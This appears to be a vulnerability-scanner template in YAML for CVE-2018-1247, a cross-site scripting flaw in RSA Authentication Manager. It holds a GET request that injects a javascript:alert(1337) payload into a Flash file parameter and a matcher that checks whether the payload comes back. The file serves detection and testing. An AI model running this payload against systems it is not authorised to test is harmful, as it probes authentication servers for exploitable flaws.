17 lines
343 B
YAML
17 lines
343 B
YAML
|
id: CVE-2018-1247
|
||
|
|
||
|
info:
|
||
|
name: RSA Authentication Manager XSS
|
||
|
author: madrobot
|
||
|
severity: medium
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//"
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- "alert(1337)"
|
||
|
part: body
|